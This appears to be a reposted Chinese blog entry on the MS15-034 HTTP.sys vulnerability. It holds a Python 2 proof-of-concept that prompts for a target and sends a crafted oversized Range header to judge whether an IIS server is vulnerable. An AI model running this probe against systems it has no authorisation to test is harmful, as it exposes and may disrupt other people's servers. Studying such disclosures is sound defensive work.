zoukankan      html  css  js  c++  java
  • HTTP.sys远程执行代码漏洞

    远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

    官方文档:https://technet.microsoft.com/zh-cn/library/security/MS15-034

    POC(python2):

     1 #!/usr/bin/env python
     2 #-*-coding:utf-8-*-
     3 
     4 import socket
     5 import random
     6 
     7 ipAddr = raw_input("Please set your target:")
     8 hexAllFfff = "18446744073709551615"
     9 req1 = "GET / HTTP/1.0
    
    "
    10 req = "GET /  HTTP/1.1
    Host: stuff
    Range: bytes=0-" + hexAllFfff + "
    
    "
    11 
    12 print "[*] Audit Started"
    13 
    14 try:
    15                 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    16                 client_socket.connect((ipAddr, 80))
    17                 client_socket.send(req1)
    18                 boringResp = client_socket.recv(1024)
    19                 if "Microsoft" not in boringResp:
    20                                 print "[*] Not IIS"
    21                                 exit(0)
    22                 client_socket.close()
    23                 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    24                 client_socket.connect((ipAddr, 80))
    25                 client_socket.send(req)
    26                 goodResp = client_socket.recv(1024)
    27                 if "Requested Range Not Satisfiable" in goodResp:
    28                                 print "[!!] Looks VULN"
    29                 elif " The request has an invalid header name" in goodResp:
    30                                 print "[*] Looks Patched"
    31                 else:
    32                                 print "[*] Unexpected response, cannot discern patch status"
    33                                 
    34 except Exception,e:
    35                 print e
  • 相关阅读:
    iOS exit(0); 直接退出程序
    友盟推送简单调用
    KxMenu下拉菜单
    打开相册另类写法
    简洁调用字号
    十六进制颜色宏
    Swift定义单例
    不要在初始化方法和dealloc方法中使用Accessor Methods
    copyin函数
    c语言中的赋值
  • 原文地址:https://www.cnblogs.com/panisme/p/9222385.html
Copyright © 2011-2022 走看看